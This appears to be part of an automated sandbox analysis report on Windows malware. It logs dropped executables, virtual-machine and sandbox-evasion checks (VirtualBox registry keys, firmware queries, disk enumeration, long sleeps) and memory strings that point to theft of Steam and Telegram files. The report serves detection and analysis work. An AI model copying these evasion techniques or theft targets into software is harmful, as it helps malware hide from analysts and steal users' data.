                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\FB48.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Query firmware table information (likely to detect VMs)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeSystem information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeSystem information queried: FirmwareTableInformation
                      Tries to detect sandboxes / dynamic malware analysis system (registry check)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: X5lLjSzDd8.exe, 00000003.00000002.340984678.000000000052B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK#
                      Checks if the current machine is a virtual machine (disk enumeration)Show sources
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\Desktop\X5lLjSzDd8.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Local\Temp\BEE7.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rfudbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rfudbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rfudbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rfudbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rfudbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Users\user\AppData\Roaming\rfudbriKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                      Source: C:\Windows\explorer.exe TID: 6216Thread sleep count: 563 > 30
                      Source: C:\Windows\explorer.exe TID: 6212Thread sleep count: 134 > 30
                      Source: C:\Windows\explorer.exe TID: 6220Thread sleep count: 256 > 30
                      Source: C:\Windows\explorer.exe TID: 800Thread sleep count: 255 > 30
                      Source: C:\Windows\explorer.exe TID: 1148Thread sleep count: 137 > 30
                      Source: C:\Windows\explorer.exe TID: 1236Thread sleep count: 58 > 30
                      Source: C:\Windows\explorer.exe TID: 5336Thread sleep count: 207 > 30
                      Source: C:\Windows\explorer.exe TID: 5344Thread sleep count: 161 > 30
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exe TID: 1288Thread sleep time: -48000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exe TID: 7048Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exe TID: 5568Thread sleep time: -32000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\DA6F.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 563
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\2D0D.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Users\user\AppData\Local\Temp\E8E7.exeThread delayed: delay time: 922337203685477
                      Source: explorer.exe, 00000006.00000000.310598844.0000000008A32000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
                      Source: explorer.exe, 00000006.00000000.310598844.0000000008A32000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: DA6F.exe, 00000011.00000002.556752293.0000000001778000.00000004.00000020.sdmpBinary or memory string: VMware
                      Source: explorer.exe, 00000006.00000000.336196701.000000000ED0B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000006.00000000.333402120.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: DA6F.exe, 00000011.00000002.556752293.0000000001778000.00000004.00000020.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware42A_CZ5MWin32_VideoControllerF6GL3VKXVideoController120060621000000.000000-000395.2445display.infMSBDADDCB_PVSPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsNCL1NGZR
                      Source: explorer.exe, 00000006.00000000.333402120.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
                      Source: explorer.exe, 00000006.00000000.289242409.00000000048E0000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000006.00000000.333278107.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
                      Source: explorer.exe, 00000006.00000000.333402120.0000000008B88000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
                      Source: E8E7.exe, 0000001C.00000002.564105663.0000000005E1D000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
                      Source: explorer.exe, 00000006.00000000.333278107.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: DA6F.exe, 00000011.00000002.577874167.0000000006E28000.00000004.00000001.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware42A_CZ5MWin32_VideoControllerF6GL3VKXVideoController120060621000000.000000-000395.2445display.infMSBDADDCB_PVSPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsNCL1NGZR]
                      Source: explorer.exe, 00000006.00000000.306700834.00000000069DA000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD002
                      Source: 2D0D.exe, 0000001B.00000002.525274596.0000000001212000.00000020.00020000.sdmpBinary or memory string: NTryInitScannedFilesTryInitSteamFilesTryInitTelegramFilesTryConfirmTryGetTasksuserremoteTasksTryCompleteTasktaskIdGCSuppressFinalizemanagedIClientChannelpbXR5QNFAGAxyIGe66yiWd139N2qyew1UML6CxXlhWSuNkWABWpdxHLOOq2VaQGNCRJZcgyhVycCe2OQ1TNjeLosJdIeKGIget_ServiceCertificateDgsAPlNeV5PjQRYKrZRX509CertificateValidationModeset_CertificateValidationModeV2LOI1N4KE8bAxqroVrCreateHeaderI0UKK8Ndtnr7AHaOdPkiAE7nVNxOWampuyQwhqdTNiHkNaqcLDjb8hWgsmUfokGNTS1CgYB5cFAioILxNkN80dCG7PufypZcyIQTaNfjQf5bBPXTgHMHYrRgNh6urd5CQ7663updateIdV6a7sFNogAgntweHWeROC9quqN0lEO40lxdq30ICommunicationObjectCloseMStfpMNXRLkP1k9vdYJAbortIeFxPqN5TsL0KnIsOqsGUPsdUNcmWckjrEFTVFQxi6s2NY6RunThreadSystem.ThreadingSleepThreadStartset_IsBackgroundjAI3kdNvnEB2DhpdSG2StartvMCIKUNKoB0HmFY2lKlGhbklANiHcnBQfvHnDyAgaFBjNgfNe4TWI9mj5hGGbHCNt5KiRcE5WLNtgTUgM0Ny3Ll9s1A3sQ9rw7yfANSrR4MQDMfVgbkN1ZsCNb8IZyEVIUO7XjFFvsGNAMwgogLZh507GelNqENP6d4LG2p8Payfl92iyNlaap2iYsEJlRkJ9pbONYGGXMenkHQXiorE5VQryYuQod5dcOU1TB7Fx7XLmtfQa7XLwuG1myw58k9yVYMessageBoxSystem.WindowsPresentationFrameworkShowMessageBoxResultMessageBoxButtonMessageBoxImageWBO3imLsndGhfcdiSZJdlLyPnLrwi0dhD1fWjveKn4wtLM0GYVCvaDWKkIPIDMessageKeyVersionFQnGiqNGWSeu8rlhpFlxSvh8hNm6QYp8g9uTS2IWmOGYNreXc74lNKQSihq3YhJNMBij2kVKnE1oOrderByIOrderedEnumerable`1RandomSendconnectionsettingssdf9j3nasdInvalidOperationExceptionVisibleDirectoryDeleteCreateDirectoryLSIDsd2asdkadu8get_UserNamesdfo8n234AssemblySystem.Reflectionget_Locationsdfi35sdfget_EnglishNameasd44123TypeGetTypeFromHandleRuntimeTypeHandleBinderMicrosoft.CSharp.RuntimeBinderMicrosoft.CSharpCallSiteBinderCSharpBinderFlagsCallSit